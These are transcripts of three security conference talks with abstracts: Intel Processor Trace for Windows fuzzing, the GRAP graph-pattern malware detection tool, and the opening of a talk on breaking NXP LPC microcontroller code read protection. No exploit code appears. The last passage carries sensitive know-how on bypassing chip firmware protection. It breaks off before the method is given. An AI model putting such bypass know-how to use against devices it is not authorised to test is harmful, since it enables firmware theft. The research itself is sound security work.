executions a second. That's a little bit disappointing. We're kind of hoping to see a little bit faster. Now, you have to keep in mind again that this is just iterative tracing. We're not doing in-memory fuzzing. So, once we get to doing in-memory fuzzing, this number will increase significantly. However, this is not the end of the story. I originally was doing all my testing against their setup with the GDI plus wrapper. And as you can see in my command line here, this is tracing only the Windows Codex DLL and the GDI plus DLL in the process. So, I made another demo in order to compare the performance. And this time we'll trace libpng using WinAFL. And so, this is just what libpng statically compiled into a small harness that will just load a png file. It will fuzz it and then it will fix up check sums and then it will parse it through libpng. And we see that the performance becomes quite abysmal, actually. So, this is the Dynamo Rio. That's expected. But we're seeing only 0.5 executions per second. So, this is quite slow, obviously. This is not where we want to be. And this is because since this statically compiled all of the code involved in libpng, including the encryption or compression and things like that, are included here, which causes some issues in the Dynamo Rio backend. Now, here's the fun part. We have a constant overhead when we use Intel PT. So, using Intel PT, we can see that we're back up in that. This will creep up to about 55-60 executions a second. So, instead of being only a half an execution a second, this is 100 times faster than the Dynamo Rio backend. And this is doing the full code coverage tracing, finding new paths, and so on. So, with this engine, we've done 100 times performance increase depending on your target application. And this is not specifically chosen. This was just randomly I had this fuzzer laying around and uses the demo. So, yeah. So, that's my demos for this plugged into 1AFL. Thank you. And so, just closing remarks now. Number one, all the code that we've written is already open source. They're going to be open source. We're on GitHub slash Intel PT. Real simple. The driver is already there. I actually have a pull request from Andrea from last night. So, the latest version is on GitHub. It'll be merged tonight. The 1AFL needs a little cleanup. I was up till 3.30 last night making my final preparation. So, that code will be up next week. And then we just have a few more things that we need to address. But obviously, you know, we see that code coverage is being finally harnessed to make our fuzzing better. We can load this information into IDA to do our analysis of crash or malware or whatever it might be. And using the hardware supported tracing engine, we don't have any issues like you would have with other software-based instrumentation and hooking engines. You know, once, you know, one of our future plans is to get this into a hypervisor so that we can trace the guests inside of a hypervisor. And then your, you know, your malware tracing will be basically, you know, unobservable and you won't be able to disable it in that method. There are capabilities of deploying Intel PT to trace things like SGX mode and SMM and BMM. And those are kind of future areas of work. And then also, my end goal is, of course, to get this fully supported with persistent mode and everything as well. One thing that we need to do as part of that is to finish the ETW-based thread context switch awareness, because we need to separate these logs out into a per-thread instance. Otherwise, you have to use the timing information to determine where the synchronization is between the threads, and that slows down the parsing a lot. So our goal is to get the logs individualized before you do your parsing, and so you only have to parse the thread that you care about that's doing your, you know, your file or network I.O. And did you have any further comments, solutions? Just wanted to say that the new version that we are going to release already support the XAVE feature, and if you download it, you can test it directly, and it's quite a cool feature in my opinion. Okay, so you can get this code and you can reach us on Twitter, and thank you very much. Thank you. Hopefully, I think we might have a minute for questions. We're just on time. Yes. Okay, Trace, inside the filter machine. So currently, there are, we, there are any hypervisors that currently expose this and virtualize this. For example, in the other hardware tracing modes, the hypervisor has to virtualize the support for writing those MSRs. This does exist, like, for example, in VMware using the BTS mechanism, but Intel PT is rather new, so there aren't any hypervisors that are available yet. So we are either going to have to modify Zen or KBM, and we've been actually even just today talking about perhaps being able to trace the entirety of the hypervisor and then later on pull out only the user mode processor kernel threads that you're interested in. So currently, no, but absolutely, we'll continue working on this until we get there. Thanks. Yeah, and I know that that will hopefully be applicable for cuckoo sandbox, so. Were there any other questions? Okay, feel free to grab us. Thank you very much for your attention.
|
This talk will explore Intel Processor Trace, the new hardware branch tracing feature included in Intel Skylake processors. We will explain the design of Intel Processor trace and detail how the current generation implementation works, including the various filtering modes and output configurations. This year we designed and developed the first open-source Intel PT driver for the Microsoft Windows operating system. We will discuss the architecture of the driver and the large number of low level programming hurdles we had to overcome throughout the development of the driver to program the PMU, including registering Performance Montering Interrupts (PMI), locating the Local Vector Table (LVT), managing physical memory. We will introduce even the new features of the latest version, like the IP filtering, and multi-processor support. We will demonstrate the usage of Intel PT in Windows environments for diagnostic and debugging purposes, showing a “tracing” demo and our new IDA Plugin, able to decode and apply the trace data directly to the visual assembly graph. Finally we discuss how we’ve harnessed this branch tracing engine for guided fuzzing. We have added the Intel PT tracing mode as an engine for targeting Windows binaries in the widely used evolutionary fuzzer, American Fuzzy Lop. This fuzzer is capable of using random mutation fuzzing with a code coverage feedback loop to explore new areas. Using our new Intel PT driver for Windows, we provide the fastest hardware supported engine for targeting binaries with evolutionary fuzzing. In addition we have added new functionality to AFL for guided fuzzing, which allows users to specify targeted areas on a program control flow graph that are of interest. This can be combined with static analysis results or known-vulnerable locations to help automate the creation of trigger inputs to reproduce a vulnerability without the limits of symbolic execution. To keep performance as the highest priority, we have also created new methods for efficiently encoding weighted graphs into an efficiently comparable bytemap.
|
10.5446/32387 (DOI)
|
OK, so we're going to talk about pattern matching and pattern matching within binaries and the patterns that we're going to define our graphs. So we will see how we can write patterns as graph and match them within binaries. Just a quick word about ourselves. So I am Aurélien Thierry, I'm malware analyst at Airbus. And I'm Jonathan Thule. I'm also a malware analyst, but at Storm Shield. So through our presentation, we will talk about malware sample, which is a backspace, actually that's more like a malware family. It was first seen in 2015, and it's a rat. So what we found in, what we find in the backspace is a small decryption function that will decrypt encrypted configuration variables, such as CNCs, ports, or registry entries. So what we see is that the decryption function is quite simple. So it's a small routine. Here we can see it on the left. So you have simply a loop with XOR, which has an argument 11, then followed with a sub that has an argument 25. In the backspace family, we find many variants of this decryption sample. So with this kind of family, what we want to do is first to do detection, so to detect the malware, then to classify the variants based on the decryption algorithm that is used, and then to be able to decrypt the configuration variables, since we know which algorithm is being used. One thing you can use to do that is to use YARA. YARA, it works on bytes, so you will write regular expressions on bytes, and so it will look like the following expression. You will say, in order to detect XOR, then the sub, you will say, okay, I need the byte 80. Then I need any byte. You can take any byte. Then I need the byte 11, which is the argument here of XOR, 11. Then I need the byte 80, then any byte, then the byte 25, which is the argument of sub. But this way of writing a matching signature is not really easy to read. So what we wanted to do with Grapp was to have signatures that are based on the instructions that are within the binary and how they are linked to each other. So the kind of signature that we want to do is to say, for this sample, we want to say, okay, now find me XOR that has argument 211, and it is directly followed with a sub that has argument 225. I'll present a quick overview of the Grapp project. So since we're working on graphs, we use the dot language to represent the graphs. That is a simple text file that we will see a lot of examples later, but it's quite simple to write the graphs in this language. And Grapp, he's, at the same time, a standalone tool that you can use on the command line. Then it has Python bindings to leverage the algorithm from Grapp from Python, and we also developed an IDAP plugin. So everything is open source and available online. So Grapp has two main components. The first one is a disassembler that will take binaries and give you a dot file that is a graph representing the binary. So it's coded with Python and it's based on Capstone. And the other part of Grapp is a graph matching library that can parse dot files and then can do the graph matching. This part is more coded in C and C++. So a typical workflow for our analysis with Grapp will be to write patterns. So that's what we have here, pattern.dot. So you will write a pattern for backspace. Then you want to analyze backspace.exe. So you give it to the disassembler that will give you a pattern, backspace.dot, which is a disassembled part as a graph. And then you will give the pattern and the disassembled graph to the graph matching library that will give you matches and extracts the instructions that you are interested in. So backspace is a binary, okay, so it's a sequence of bytes. Those bytes can be interpreted in assembly language. So a sequence of instructions. So we can see the XOR and the subroutine for the decryption. Then we can create the graph, CFG, so the flow of the execution of the instruction. And in the standalone pool, we use recursive function to create this graph. And we are best for the disassembler on Capstone. But for the Ida plugin, we use the Ida engine for the graph. So we can create the graph. At the right we have, sorry, my French word. We have the graph of backspace, okay, at the right. And we want to match the pattern at the left, which is the decryption routine. To do so, we use the usual, we can use the usual algorithm. So at the left we have the pattern. And at the right we have the test graph. And the goal is just to search the first call. So, okay, we found the first call. Then we got to look to the children. There is an ad. So we got to look to the right. We have the XOR. So we got to try the other child. So we have the push. So we got to search for another call. So, okay, we match a call. The same thing we have ahead. So we go to look to the push at the right, the right children. And no. So we tried the other one. Yeah, we matched the ad. So again, there is a call. Yeah, there is a call. Okay. So next and so on. So we found the push. Okay. And so on. So, okay. It's pretty simple, but you need to check every child of the node. And it's pretty slow on big graphs. So since the usual solution is pretty slow on big graphs, we wanted to have a fast resolution. So we wanted to have different algorithms. So one thing we can say about control for graphs is that there are not any graphs. So the first property they have is that usually when you will disassemble them, you will see that a node in the control for graph has at most two children. It happens when you have, for instance, sorry, a conditional jump. You have one child that will be reached when the condition is fulfilled and one child that will be reached when the condition is not fulfilled. So that's the first property we have on control for graphs. Another property is that the children are not symmetrical. Usually you will find that one of the child is directly the following instruction as the next address. And the other child is a remote instruction somewhere else in the program. So we cannot invert them. So we will force that in our graphs, you cannot invert the order of children. So what you need to see now is that once we say that children are ordered in your graphs, the objects we are manipulating are not really graphs anymore and that will help us have a very fast matching. The other thing we can say about patterns. So I talked about control for graphs in general, but patterns are specific. As we saw earlier, it's easier to match them from their first node. So we will force that every pattern has a first node. So the first node, it's a root node that's, that from this node, every other node of the graph can be reached. So on the example on the right, that is our pattern for back space, you have the first node on the top, which is a root node because from it you can reach every other node. Okay. So with this restriction, we will have fast matching. I'll explain why. So this slide will show you how we can represent a pattern on a different form. So the pattern we have now are what we see on the left. So we have a call and add, compare, then a push and a push and the children are ordered. We have child number one and child number two and child number one is here. So there is, with this kind of thing, since we have a root node, which is a call, there is a unique way to number this graph with a depth first search. So that is the following. I take the root node. So this is a call. I number this one one. Then I take the first child of the call. I get here to the add. I number it two. Then I take the first child and number it three. Then I go back to the call. I will go to the child number two, number it four and go to the child number one, number it five. So I can describe it on a text way as this. So it's equivalent to the pattern. And that means, okay, I'm looking for a pattern for a graph which has as a first node a call. Then it has a first child. If you take it, you get to an add. Then I take again the first child. If you take it, you get to a compare. Then you go back to the first, to the node number one, which was a call. So you go back here and you say, okay, now you take the child number two and you get to a push. Then you take the child number one and you get to another push. So this representation as a text, well, this text representation is equivalent to the pattern representation as a graph. So once you have this, the question we need to ask is can we perform the traversal of the pattern within the test graph? So we saw that the pattern on the left is equivalent to the text representation. I add some color because it's nice service color. Yes, it is. Okay. So now it's easier. I need to find, the first thing I need to do is to find a root node that would be a call. So I have a candidate on the right here, which is this one. Then I get to the add part. So I need to see here if there is a node, a child number one, that would be an add. So I take the child number one here, I get to a XOR, so it doesn't match. I have to go back. So I have to find another root node that could be a call. So there is one here. Now I ask, is there a child number one that is an add? Yes. I will number this one too, so I get there. Is there a child number one that is a compare? Yes, it works. Then, okay, take me back to the child number, to the node number one, so back to the call. So I get there. I ask, is there a child number two that is a push? It works. I say, is there a child number one that is a push? It also works. So this gives us a matching for the pattern, from the pattern to the test graph. So that is the algorithm that we will use. So the difference with the previous algorithm is that now that children are ordered, we saw that we know that we're looking for child number one or child number two. So you don't have the exponential factor anymore. You will only have the polynomial time for matching, so it's much faster. Okay, so I will stop with the algorithms now. I will go back to the patterns. So I talked about how we can match them, but now I will say what are our patterns, how do they look like? So on the left you have our pattern for backspace, which was a decryption routine. And so we said that patterns are dot files with specific fields because we will use conditions and opcodes on arguments, on the address of the instruction, and so on. So on the right here you have an example of a pattern for backspace that matches exactly the two instructions, XOR and sub. So what it says here, so it's a dot file, it says a dot keyword, then we have the name of the pattern, so it's decrypt with XOR and a sub. Then we say it has nodes, it has two nodes. The first node is A. With the condition and the node is okay, I want to match an instruction that has XOR as its opcode and has as argument number two, 11. I have another node that is B, and the condition is I want to match an opcode that is sub, and that has argument number two, 25. And then the part here specifies the edges, so there is an edge from node A to node B, so it means I have a child from the base that is node B. Okay, a few more things about node options and edge options in our pattern language. So I said that pattern graphs are supposed to have a root node, that is a node from which you can reach every other node. So in order to specify this node, you can say at the option root is true, that means this node is a root. You have the code field that says specify the condition, so we can have a condition on opcodes, for instance. We have the get ID flag. Get ID means it will tell graph, okay, when you find the match for this node, I'm interested in this match, so I want you to print it or I want you to keep it aside so I can access it later. Okay, so that's for node options, for edge options, sorry, we saw that childs are numbered, either one or two, so we have an option to specify on an edge if it's a child number one or a child number two. So the example below is the same pattern as previously, but with every option explicitly. So we have still the condition. We have, okay, this node is a root, so that's the first node of the pattern. We're interested in this node, and I want you to mark the node with A, so that's the name of the node. For the node B, I'm interested also in the node, so you have to mark it B. And the child number of the edge was one because they are following each other. There are sequential instructions. Okay, so back on conditions. Conditions, we will be able to make conditions on instructions, and there will be conditions on the full string of the instructions, like move EAX something, for instance. We will have conditions on the address, conditions on the opcode, on the arguments, on the number of arguments, and the text of the arguments, so these are string fields. We will also have conditions on the number of incoming and the number of outgoing edges. Sorry. So that means the number of fathers and the number of children of a node. I have an example here that says I'm looking for a function that is frequently called, so that there is a call to this node. So the call is a node A, and the instruction being called is B. And then there is an edge between A and B. So the number of the edges, too, because it's not a following instruction, it is a remote instruction. And the condition we have on node B is that it has multiple incoming nodes, so that will help us find functions that are frequently called in the code. Okay, so until now, I explain how we can match one node to one instruction. But what we will want to do next is to match one node to multiple instructions. Like when you want to match basic blocks, sometimes you don't care how many instructions there is in the basic block, you want to match, say, okay, this node needs to match a whole basic block. So we can specify a minimum number of matches for a node on a maximum number of matches. It only works on sequential instructions within basic blocks, so these are instructions that have one father and one child. So it looks like that. If you have a basic block that we see here in Ida, so there are two incoming nodes, two outgoing nodes, and only three instructions here. To match these kind of things in Grapp, you just have to say, okay, I want you to match any instructions, that's what it means, called is true. And I need you to match one or more instructions or repeat is plus. If I want to match three push instructions, I will write something like that, like the, I want instructions with the opcode push, and I want them to be repeated three times. So by default, Grapp will take the most matching instructions when you specify repetitions, but you have an option to change that. You can say lazy repeat is true. So the first point was greedy repeat, like you take the most of them with lazy repeat, you will stop once the next condition is fulfilled. I'll give an example here. So back to backspace sample, we had a decryption loop. So we're interested, especially in the XOR and the sub instructions, but we can say, okay, I want a loop that looks a bit like that. So I will want to match one to five instructions. We have three here, but maybe there is less, maybe there is more. Then we have the XOR, then we have the sub, then we have again one to five instructions, then we have a conditional jump that loops back to the beginning of the loop. So the pattern would look like that. We will have here, that's a dot representation on graphs. One to five instructions, then XOR, the sub, one to five instructions, then the conditional jump. In Grapp, it will, well, the pattern would look like that. We will say, okay, I'm looking for any instruction repeated at max five times, and I want you to stop once the next condition is fulfilled. So it will match for this node A, it will match move, add move, then here it will stop because the next condition on B is fulfilled because we have XOR. Then B will match XOR, C will match sub, D will match again many instructions. So ink, compare, move, and it will stop on the last one because the last one, it says that it wants instruction to begin with J and to have two children, so that's the case with the conditional jump here. Okay, so back to our backspace samples. So I'm going to do a demo. We have a hundred backspace samples. I want to disassemble them, and then I want to detect the decryption algorithm that I saw that is the one we reversed in AIDA. Then I want to find variants of this decryption algorithm, and finally I will need to detect all the decryption algorithms. So demo time. Okay, so I have my samples here, so a hundred samples of backspace, and I have a pattern. So that's the one we saw in the slides. So we have a lazy repeat, we have refined XOR here, then the sub. I want to match it against the sample we know. So I have graph to match it against sample this one, so that's the one we worked on. So first it will disassemble the binary, then it learns the pattern, so there is one pattern that was learned. The test graph, which is the sample has 8,000 nodes, and it found one matching here. So the matching is described here. So we have the instruction that matched. We see the XOR and the sub that we were looking for. Okay, so that was for one sample. I want to do it on every sample of backspace to see what happens. Okay, so it will take a while because it needs to disassemble 99 samples, it takes around 20 seconds. So what we will see is a lot of matching and a lot of text, and then I will show you another option to have less variables output and a more quite one with one sample pair line. So that's what I say, we have a lot of text. So now I will ask it to do it quietly. So it will be much quicker because we don't have to disassemble the files again. I'll show you that. If I show the folder, now we have the.files which are disassembled versions of the binaries. Okay, so now I will launch it again with the quite option. So here I see all the pattern that all the binaries that matched or pattern, but I don't see the one that didn't match. So we find a lot of samples that use the same decryption algorithm, exactly the same, but maybe there are more. So I will ask Grapp to show me all the binaries. So okay, we see that some samples match and some of those didn't match. So what I wanted to do next was to find variants. To find variants, I went back to IDA, which is here. Okay, so here we have the decryption algorithm. I will see how it is called. So what we see is that it's very simple. You have a first basic block, then a loop, then another basic block. And we'll see how it is called. So there is a function here that has a lot of calls to the decryption algorithm. It's always two pushes because there are other arguments, then a call to the decryption function. So I wanted to write a pattern to see and to detect this. So what I did was this pattern. So I asked that we find something with two pushes, then a call, then again two pushes, another call, four times. And they all point to a function that has a first basic block, then a loop, then an end basic block, then a return instruction. And what I say here is that I'm only interested in getting the loop. So I said get ID, I said get ID only on the loop node. So I'll show you how it looks like with that. And I have a colored version because it's always better with colors. Okay, so we have here two pushes, then a call, then two pushes, another call. They all point to the same function. And we're interested in the loop here, which is where the decryption algorithm happens. Okay, so now I need to match this against my samples. Okay, so I find here the first decryption algorithm that we already know is XOR 11 and 25, again the same. Here we have another one. There is a sub. Then XOR with another constant. Then another sub. And there is again the same one. Then, well, we will find that there are many more. I won't show you them all, but what we did next was write a pattern for this decryption variance. So we have, there are very small patterns. So the first one is the one we knew, so 11 and 25. This one is the one we just saw, the B and 12. And there were like five other ones that I won't detail. So what we do now is we want to match them against the backspace samples. So what we see here is that a lot more samples matched, and we know which algorithm was used. So here the pattern that matched was XOR sub. Here it was a sub XOR sub. Here there is another one, another one, etc. So one more thing we wanted to know is that we still have some unmatched binaries. So I want to know why they don't match. One simple thing we did, not really in this order, but it works. We asked for section names. We see that it's UPX, so some samples seem to be packed with UPX. So what I do is I wanted to have a quick signature for these UPX files. So I will look for basic block loops. That means basic blocks that loop to themselves. So I have a pattern for that that I will use now. So I find two basic block loops. I didn't really look into what they're doing, but I wanted to use them as signatures. So I wrote a UPX signature which contains these two loops. UPX loop one and UPX loop two. So what I did next was to match them. Okay, so there seems to be more samples that are packed with UPX and I always match the two loops. So I know how to detect variance of backspace. I know how to detect files packed with UPX. So I want to detect them both. So I will combine the two signatures. And I will match them. Okay, it's better. So we still have a few un-matched binaries, but most of them we see that they are either a variant of backspace and we know which algorithm is used or they are packed with UPX. Okay, back to the slides. So what we saw is that we found seven variants of UPX. So there was the first one with Zoro 11 and Sub 25. There was another one that we saw, then five other patterns. We also found out that some binaries are packed with UPX and we wrote a quick signature for these files. We matched them. So what we did is on all 100 backspace samples, it took around 20 seconds to disassemble them. Then to do the matching of nine patterns, it took a little more than two seconds. And in the end, we see that there are like 17 files that are packed with UPX. The half of the samples that have the first pattern that we looked at and the other patterns are used sometimes. And in the end, there was still 11 binaries that we did not identify correctly. So okay, to simplify the creation of scripts, we create Python bindings of the C++ library with Swig. And now with Python, we can disassemble, we can load patterns and test graphs. We can load pattern graphs and test graphs. We can match patterns and parse all the results. So here we have some examples of Python scripts. So at the beginning, we have the import of a library. Then we have the, we load the pattern.file. We extract the graph from the binaries. We still assemble file. Then we load the test graph and after we match the graph, the pattern in the test graph. So here is an example of a pattern. We want to match three pushes. So we use the match graph. And now we can get all matching patterns. Then we can select the pushes patterns. And now we can, with these pushes patterns, we can get all matching instructions. Then we can say, okay, I want to get the IDP. So it gives all instruction with the get IDP. And then we select the first instructions. So now we have the instructions. So we can request some information like the addresses, all the old instruction strings, the opcode, the arguments, and so on. So okay, we can match the decryption loop. And we saw that we have a lot of pushes and call to the decryption strings. So we want to match the two pushes and the call to the decryption routine. Okay? So we have, we want to check, match the first pushes, which is the length, then the encrypted string, and then the call to the entry point of the function to decryp, both strings. So we have the decryption entry point. We can match the address of the, all the decryption loop. So we have the address of the match. Ah, damn it. Okay. So to get the entry point, we know that the function is very slow, very tiny. So we can say, and we know also that the decryption entry point is before the decryption loop. Okay? So we can say, we want to search a node between the decryption address and between the decryption address minus 30. Okay? And we want to match a node with at least five or more incoming. So a little demo. And so the script is here. We have the import. Then we get the binaries. We create the graphs. Then we have those patterns to match the entry point. Then to match the pushes before the call of the decryption function. And we implement the whole variance of the decryption algorithm. So here you have sub-xor, sub-add, and so on. Ah, damn it. So, maybe have it in my log. Okay. So we got to execute the script with a sample. So now we can decrypt those strings. So we have the sample. We match the decrypt-absorbs-sub. Okay? Then we found the address of this routine. Here we match the entry point with the more than five or more than five incoming between the address of the decryption minus 30. Then the address of the decryption. So we found the decryption function. It's the entry point. So now we got to look for the pushes, okay? With the entry point of the function. And then we match 35 calls to this decryption function. And so after this, we take the string, the encrypting string. Then we decrypt it with the algorithm. And now we can see we have some registers and some text files and so on. So now we can do this on all samples. So here we have the first samples with strings, registries. Then we can find some easy on other samples and so on. So there we have all the strings of the configuration and so on of backspace. So okay, we have a tool, but it can be nice to have a plugin tool in IDA to match those patterns. So we have an IDA plugin. We convert the IDA graph to forGrap. Then we can match patterns with PGrap, which is the Python binding. And then we can, with the UI, browse those patches and put some color on it. And then we apply some filters technique. So match a single pattern. For example, for RC4 set key, we have two small loops for the initialization. And if we create just one pattern for those two loops, we have a lot of false positives. So we create some filter techniques. It's quite simple and obvious. So for example, the set key for RC4, we have two loops for the first loop is the first pattern and the second loop is the second pattern. So if we don't have those two loops in the function, it's not all functions. So you can see at the right we have the two patterns. So okay, it's accepted. But if we have just one pattern, it's rejected. We have also the rate techniques. So also quite simple. We have two loops. But if we have more than two loops in the function, so if we match, for example, three times the pattern one, the function is rejected too. Because we just want the first loop one time and the second loop one time too. Then we have the threshold. So sometime with the pattern, we can have some errors. So at the right, we have four patterns for one function. So we match all patterns. So okay, it's good. But in the middle, the pattern number four, sorry, are not here. So the function is also, for example, the function of decryption. But we missed some patterns. So we create a threshold. So here we have a threshold of 0.75. That means that at least we want three out of four patterns. So in the middle, it's accepted two. But at the left, we just have two out of four. So we reject this function. The last one is the overlapping. So in, for example, again, the offset key, we have the two loops. We create one pattern for the first and another for the second. And if we match the same loop with those two patterns, that means we match the same loop and we don't want this. But in the example at the left, we have two matches of the first pattern and one of the second. There is a overlapping between the first and the second. So if we remove the pattern number one for the overlapping, we have valid matches at the right. So we can say, okay, it's all function. This technique is not yet implemented in either graph. So the creation of a rule for the plugin is quite simple too. So for the RC4 set key, we create the first loop. So loop one, we give the path to the dot find, to the pattern. Then we give a name, a description of this pattern. Then we say, okay, a minimum pattern is one. So that means I want to match one time this pattern or more. Then we fix the max pattern. So we say, I want at max one time this pattern. So we must match just one time the first loop. We do the same things for the second loop. Then we create the function patterns. So we give the two loops because we must match those two loops in the function set key of RC4. Then we put the threshold that here is one. So it means we must get the two patterns to validate the function. Then a name, a description, and blah, blah, blah. So demo. Okay. So we get a load of the plugin. So the fingerprint is to find the patterns. So, okay, we launched. Here we can see we have matched some patterns. So we can click on it. And then we have the description routine. Okay. But sometimes we don't know really where are the matched. So we put some color in it. So here, beam. Okay. And then we have the color on the two instruction for the decryption loop. And we have some color on the entry point. So, yep. Here we have, okay, is the pushes for the strings. And if we, I don't know, we renamed it. Okay. Then we launch again the scan. Here we have the name of the function also with the number of instruction and so on. Okay. RC4, the match are not efficient because the loops are very small and very generic. So we still have many false positives, but we have few false negatives, which is cool. So the tooling is appropriate. Okay. And we can try maybe to create other signatures for other cryptographic algorithm, packers and so on. And maybe we can put the filtering techniques in P-Grap because it's only in IdaGrap. So the perspective, some limitation of our tools, all the arguments, instruction, opcode and so on are in our strings. So sometimes we have to do some dirty hack to get, for example, the conditional jump. So we want to match an instruction, strings, that begin with J, okay. And we want the node to have two children because in the graph, the instruction with children are calls and conditional jumps. So we are lucky calls begin with C. So, okay. And we have other problem because in the standalone tool, we use the capstone engine and in Ida, we use the Ida engine. So sometimes with, for example, the variables we have in Ida 25H for the exodysmode value 25. And in capstone, we have 0x25. So again, dirty hack to catch both cases. So R2, we catch 25 or 0x25. So the solution is semantics. The idea behind that is to say, okay, I want to check if my argument one is a register or I want to check if the opcode is conditional jumps and so on. The same things for the, for R1 if we want to catch an integer, an integer with the value 25. But maybe in graph V2, okay. Okay. There is another limitation of the, how we write patterns. That is, that we can, we explain how we can do node repetition. But there is one limitation that is the following. We can either, with node repetition, we can either say I want the least number of matched instructions or I want the maximum number of matched instructions. There is no in-between. So the problem is this one. We have a pattern that says I want to match one to four any instruction. Then I want to match a XOR, then I want to match a CULL. Then I say, okay, this is our following instruction. So it's one to five anything. Then XOR, then a CULL. And so there is a lazy repeat here. We can either put true or false. If we put true, it will mean that we want to take the least number of instructions. If we put false, we want to take the maximum number of instructions. So we will see how to match this pattern on the binary graph that would have a push, then a push, then XOR, then another XOR, then a CULL. So with the current tool set, if we put lazy repeat to true, the matching for the any node will stop once it switches XOR. So for any, it will take push, push, then it will stop. Then the XOR node will match the XOR. Then the CULL node will try to match XOR. It doesn't work, so there is no match. So it doesn't work with lazy repeat at true. If we put lazy repeat at false, so the any node will try to match the maximum number of instructions. So the problem is it is greedy. So the any node will match push, push, XOR and XOR because it matches four instructions. And then we get to the XOR node that finds a CULL. So it doesn't match. It doesn't work either. So there is no way for our tool now to match this binary thing with this pattern. But it is counter-intuitive because as with regular expressions, we would like to say, okay, I don't care if any takes one, two, three or four instructions, I would like to test them all. So of course the solution, maybe also for grab V2, would be to try every number of repetitions, so one, two, three, four. Of course it will be slower, so we will need to watch out for an impact on performance. Okay, we have a lot of more ideas that we would like to implement in the patterns. One thing that is limited also with the current version is that for basic blocks, we only have instructions on the condition on basic blocks for now will apply to every node. And what we would like to say is I want to find you a basic block that has at least one XOR instruction or find you a basic block that has at least two XOR instructions and one compare instruction. That we cannot do for now, so maybe we will also work on that later. So we said that children are numbered. So you have to specify when you do the edges if you're talking about trial number one or trial number two. Sometimes we will want to say, okay, I don't care. So this might be the, for instance, for conditional jumps, you could say this could be the child for when the condition is fulfilled or for when the condition is not fulfilled, I don't care. So we would like to add an option that would be child number is a question mark and also the algorithm to try the both options. Then as Jonathan explained, we would like to have meta patterns in PyGrap, which would be able for us to say, okay, I have five patterns. I want a match if we find three of them. That's enough. Or we would like to say, okay, I have two patterns, P1 and P2. Find me a binary that has one match of P1 that is directly followed by a match of P2. That is, there is one instruction of P1 that has a child, an instruction of P2. We would like to do some pattern linking like that. The last point is that for now we constructed the graphs manually with writing text files. It works. It's okay when you have, when you use tweets, it's quite fast, but it would still be easier to be able to select nodes in Ida and then click export. It will generate a nice dot file with all the nodes and all the edges that you want. It will be much faster to create patterns. Okay, so this will end our talk. The conclusion is that Grap is at the same time a standard tool. It has Python bindings. We have an Ida plugin. Our goal was to create a tool that can make graph patterns that are easy to write and easy to understand. We believe it is useful for detection and automatic analysis. We showed that in Backspace and it worked. The tool is a fully open source and you can find it online at this address. As a perspective for the future, maybe for the V2, we would like to add some pattern features. We talked about parsing semantics and information from instructions. We talked about condition and basic blocks. We would like to be able to create patterns directly within Ida. And then we would like to have many more examples that work. On crypto algorithms, we want to try with AES and on packers and common packers. So this will end our talk. Thank you for listening and we will try to answer questions. Thank you for the talk. Very good talk. I was wondering if you had thought about using things since you can have capstone in Ida now. I haven't tried it. But could you just use capstone everywhere? Have you thought about that? Sorry, to use capstone in Ida? We thought about it but we have not decided yet how to do it. I'm going to do this, I guess. Thank you.
|
Disassembled binary code can be turned into a graph of instructions linked by possible execution flow (Control Flow Graph). Based on academic research on malware detection through graph matching and facing large numbers of similar files to analyze, we aim to provide accurate results to an analyst working on malware families. Our approach is a YARA-like detection tool: GRAP matches user-defined graph patterns against the CFG of a given code. GRAP is a standalone tool that takes patterns and binary files, uses a Capstone-based disassembler to obtain the CFGs from the binaries, then matches the patterns against them. Patterns are user-defined graphs with instruction conditions (“opcode is xor and arg1 is eax”) and repetition conditions (3 identical instructions, basic blocks…). The algorithm solves a simplified version of the subgraph isomorphism problem, allowing the matching to be very quick. It can be used to find generic patterns such as loops and to write signatures to detect malware variants. We also developed a plugin giving IDA the capabilities to detect and browse matches directly within the GUI. Python bindings are available to create scripts based on GRAP and extract valuable information (addresses, instructions) from matched parts. In this talk, we will introduce the algorithms used and then focus on practical use cases: detect common patterns (from the command line or within IDA), create a malware pattern, and extract information from matched instructions. The tool and the plugin will be released under an open source license.
|
10.5446/32392 (DOI)
|
My name is Chris Krulinski. I'm a hacker from Canada and I'm here today to talk about how to break the code read protection on the NXP LPC family of arm microcontrollers. So the LPC family of microcontrollers, they're a low cost 32 bit arm microcontroller. There's a variety of parts in the family. They have an internal flash ranging anywhere from 8 to 512 kilobytes and from 1 to 282 kilobytes of RAM. In parts from the family have a different set of various peripherals including the UART, USB, CAN and Ethernet controllers. There's a variety of parts in the family. They all share a lot in common. It's mostly the peripherals and the memory size that differs between them. Inside of the parts they have a boot loader for in-system programming. So this boot loader allows you to load your program into the flash area. It's quite a simple boot loader using a serial protocol. There's a list of the available commands here including to write to flash, also to read from flash using the ISP interface. There's existing software that you can use to use the ISP interface. There's a software from NXP that runs in Windows. There's a nice open source program called LPC21 ISP and there's some others too. You can write your own quite easily. They have all the documentation for this protocol and the data sheets. Inside the boot loader they have support for CRP or code read protection. They have three levels of the code read protection that they've defined. The CRP level one will disable the read command in the boot loader but it does still allow flash writes to some areas of the chip. The CRP level two will disable the read command and also disable all flash writes. Then the CRP level three will disable all the commands and it will also disable access to the boot loader entirely. You have no access to the in-system programming. Additionally, they have a fourth level that they call no ISP which doesn't disable any of the debugging features in the chip but it does disable the serial boot loader. That's an additional option. For the CRP levels one, two and three in any of these the debugging will be disabled. Here we have a flow chart showing the boot process inside the ROM boot loader inside these chips. We can see from reset it does some initialization. It will do a check to see if the code read protection at any level one, two or three is set. If the code read protection is set, it will disable the debugging. Otherwise it will enable the debug interface on JTAG. It does some other checks like checking if the watchdog flag was set and if so, then it will go back into the program because it had a reset due to watchdog. Otherwise it will continue and it will check if the code read protection level three or the no ISP are set because these ones will disable access to the boot loader. If they are not set, then it will check to see if you are holding one of the GPIO pins low that triggers the access to the boot loader. If it does not go into the boot loader, it will go into the application but before it goes into the application, it will check if it considers the flash code valid and it does this by calculating a check sum of the first area of the vectors inside flash. If this check sum is valid, then it will jump to the reset vector inside flash. Otherwise it will fall through again into the boot loader interface. Some of the chips have a USB boot loader in addition to the serial boot loader. Some of them don't support the USB. If they do support the USB boot loader, then it will determine if you have the USB connected by checking if there is a high voltage on the V bus pin of the chip. If you want to disable the USB interface and access the serial boot loader instead, you have to hold the V bus pin low. If all these conditions are met, then eventually it will execute the serial boot loader out of ROM. We can see that they use a 32-bit word in flash to define if the code read protection is set. They have four values which will enable some level of code protection inside of this chip. If any of those four possibilities of the 32-bit word are set in this location in flash, then there will be some locking set. If any other value exists in this location in flash, then the chip is going to start up in the boot loader and be totally unlocked. Out of the possible 32-bit words, there are four of them that will lock the chip, or 4,294,967,292 that will result in the chip being unlocked. So we can see already that this might be a rather fragile lock on the 